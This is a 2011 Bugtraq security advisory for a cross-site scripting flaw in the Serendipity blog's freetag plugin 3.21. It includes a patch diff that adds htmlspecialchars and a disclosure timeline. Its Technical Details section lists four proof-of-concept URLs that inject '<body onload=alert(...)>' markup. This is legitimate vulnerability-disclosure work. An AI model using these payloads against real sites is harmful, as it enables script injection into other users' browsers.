[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20110531102812.32140.qmail@securityfocus.com>
Date: 31 May 2011 10:28:12 -0000
From: sschurtz@...nline.de
To: bugtraq@...urityfocus.com
Subject: Cross-Site Scripting vulnerability in Serendipity Plugin
"serendipity_event_freetag"
Advisory: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
Advisory ID: SSCHADV2011-004
Author: Stefan Schurtz
Affected Software: Successfully tested on: Serendipity 1.5.5 with serendipity_event_freetag - version 3.21
Vendor URL: http://www.s9y.org
Vendor Status: Version 3.22 - Fix possible XSS
CVE-ID: -
==========================
Vulnerability Description:
==========================
This is Cross-Site Scripting vulnerability
==================
Technical Details:
==================
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>
=========
Solution:
=========
Update to the latest version 3.22
diff serendipity_event_freetag.php
< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $
> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24 garvinhicking Exp $
< $propbag->add('version', '3.21');
> $propbag->add('version', '3.22');
< $serendipity['smarty']->assign('freetag_tagTitle', is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag);
> $serendipity['smarty']->assign('freetag_tagTitle', htmlspecialchars(is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag));
====================
Disclosure Timeline:
====================
30-May-2011 - informed developers
30-May-2011 - Release date of this security advisory
30-May-2011 - Version 3.22 - Fix possible XSS
31-May-2011 - post on BugTraq and Full-disclosure
========
Credits:
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.s9y.org
http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html
http://www.rul3z.de/advisories/SSCHADV2011-004.txt
http://ha.ckers.org/xss.html
Powered by blists - more mailing lists